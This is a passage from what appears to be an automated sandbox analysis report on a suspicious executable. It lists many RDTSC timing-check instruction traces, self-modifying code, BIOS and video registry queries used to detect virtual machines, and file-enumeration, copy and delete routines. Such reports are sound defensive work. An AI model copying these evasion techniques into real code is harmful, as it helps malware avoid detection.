                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132946F second address: 1329473 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1329473 second address: 132948C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8ED0E3C3E3h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132948C second address: 1329491 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1329795 second address: 132979E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13298F5 second address: 1329911 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8ED0C920D8h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1329911 second address: 1329915 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1329915 second address: 1329942 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F8ED0C920CCh 0x0000000c jnl 00007F8ED0C920C6h 0x00000012 push eax 0x00000013 push edx 0x00000014 jnp 00007F8ED0C920C6h 0x0000001a jmp 00007F8ED0C920D3h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1329942 second address: 132994B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1329C0E second address: 1329C14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1329C14 second address: 1329C1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1329C1B second address: 1329C2B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F8ED0C920CBh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1329ED9 second address: 1329EEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 jmp 00007F8ED0E3C3DBh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132A03C second address: 132A044 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13326C3 second address: 13326CD instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F8ED0E3C3D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1330EC4 second address: 1330EC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133104A second address: 1331053 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1331053 second address: 1331070 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8ED0C920D8h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133132F second address: 1331355 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8ED0E3C3E9h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push esi 0x0000000b pop esi 0x0000000c popad 0x0000000d pushad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1331DEF second address: 1331E0A instructions: 0x00000000 rdtsc 0x00000002 jo 00007F8ED0C920C6h 0x00000008 jmp 00007F8ED0C920D1h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1331E0A second address: 1331E14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F8ED0E3C3D6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1332547 second address: 1332565 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8ED0C920D9h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1339A2B second address: 1339A38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop eax 0x00000007 push ebx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push edi 0x0000000b pop edi 0x0000000c pop ebx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1347B2D second address: 1347B39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1347B39 second address: 1347B3F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134A96A second address: 134A96E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134A96E second address: 134A990 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8ED0E3C3E8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134A990 second address: 134A996 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134A612 second address: 134A61C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F8ED0E3C3D6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134A61C second address: 134A62C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jo 00007F8ED0C920C6h 0x0000000d push edx 0x0000000e pop edx 0x0000000f pop esi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134A62C second address: 134A631 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134CE2F second address: 134CE46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F8ED0C920D1h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134FABE second address: 134FAC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134FAC2 second address: 134FAD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8ED0C920CEh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134FAD6 second address: 134FAEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8ED0E3C3E2h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134FAEC second address: 134FB28 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F8ED0C920D6h 0x00000010 pushad 0x00000011 jmp 00007F8ED0C920D8h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1355442 second address: 1355446 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135F31C second address: 135F331 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8ED0C920CFh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135F331 second address: 135F338 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135F338 second address: 135F340 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135F340 second address: 135F344 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1361853 second address: 1361857 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1361857 second address: 1361871 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8ED0E3C3E1h 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1368599 second address: 13685BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pushad 0x00000008 push edx 0x00000009 jmp 00007F8ED0C920D6h 0x0000000e pop edx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13685BE second address: 13685C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1366F27 second address: 1366F51 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pushad 0x00000006 popad 0x00000007 js 00007F8ED0C920C6h 0x0000000d jmp 00007F8ED0C920D9h 0x00000012 popad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1366F51 second address: 1366F57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1366F57 second address: 1366F5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13670E3 second address: 13670EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13678CF second address: 13678D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13678D4 second address: 13678E2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jbe 00007F8ED0E3C3D6h 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137BF8B second address: 137BFC9 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F8ED0C920C6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F8ED0C920D2h 0x00000011 pushad 0x00000012 jo 00007F8ED0C920C6h 0x00000018 push eax 0x00000019 pop eax 0x0000001a popad 0x0000001b jl 00007F8ED0C920CCh 0x00000021 ja 00007F8ED0C920C6h 0x00000027 popad 0x00000028 pushad 0x00000029 js 00007F8ED0C920CCh 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137BFC9 second address: 137BFFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F8ED0E3C3FEh 0x0000000a jmp 00007F8ED0E3C3E5h 0x0000000f jmp 00007F8ED0E3C3E3h 0x00000014 push eax 0x00000015 push edx 0x00000016 push edi 0x00000017 pop edi 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137BFFF second address: 137C012 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8ED0C920CFh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137C012 second address: 137C01B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138CE24 second address: 138CE33 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8ED0C920CAh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138CE33 second address: 138CE39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138CE39 second address: 138CE5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 js 00007F8ED0C920DEh 0x0000000d push eax 0x0000000e push esi 0x0000000f pop esi 0x00000010 pushad 0x00000011 popad 0x00000012 pop eax 0x00000013 jnp 00007F8ED0C920D2h 0x00000019 je 00007F8ED0C920C6h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139CEFC second address: 139CF02 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139CF02 second address: 139CF1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8ED0C920D7h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139CF1F second address: 139CF57 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8ED0E3C3F4h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jo 00007F8ED0E3C3DEh 0x00000012 jns 00007F8ED0E3C3D6h 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139CF57 second address: 139CF5E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139D265 second address: 139D26B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139D26B second address: 139D26F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139D26F second address: 139D273 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139D273 second address: 139D28A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F8ED0C920CEh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139D28A second address: 139D290 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139D290 second address: 139D295 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139D295 second address: 139D2B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F8ED0E3C3D6h 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 pushad 0x00000012 jc 00007F8ED0E3C3D6h 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a pushad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139D2B3 second address: 139D2BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139D2BC second address: 139D2C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139D405 second address: 139D40C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop eax 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139DA24 second address: 139DA2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139DA2F second address: 139DA33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139DA33 second address: 139DA4F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007F8ED0E3C3E1h 0x0000000c pop edx 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139DA4F second address: 139DA7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push edx 0x00000007 jc 00007F8ED0C920DEh 0x0000000d jmp 00007F8ED0C920D8h 0x00000012 push eax 0x00000013 push edx 0x00000014 push edi 0x00000015 pop edi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139DA7A second address: 139DA7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139DD8B second address: 139DDA6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F8ED0C920D4h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139DEFF second address: 139DF05 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A0BA0 second address: 13A0BA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A0BA4 second address: 13A0BB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007F8ED0E3C3D6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A0BB2 second address: 13A0BB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A0BB6 second address: 13A0BD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jo 00007F8ED0E3C3ECh 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F8ED0E3C3DEh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A0E81 second address: 13A0E87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A0E87 second address: 13A0E96 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A238F second address: 13A23B5 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8ED0C920E1h 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A404A second address: 13A4052 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A4052 second address: 13A4057 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 580058E second address: 58005A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8ED0E3C3E5h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B6D6A second address: 12B6D70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 10FD832 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 10FD934 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 12AC62F instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 12D6710 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 12BE9D4 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 13415A4 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeEvaded block: after key decisiongraph_0-38704
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E240F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00E240F0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E1E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00E1E530
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E247C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00E247C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E1F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00E1F7B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E11710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00E11710
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E1DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00E1DB80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E24B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00E24B60
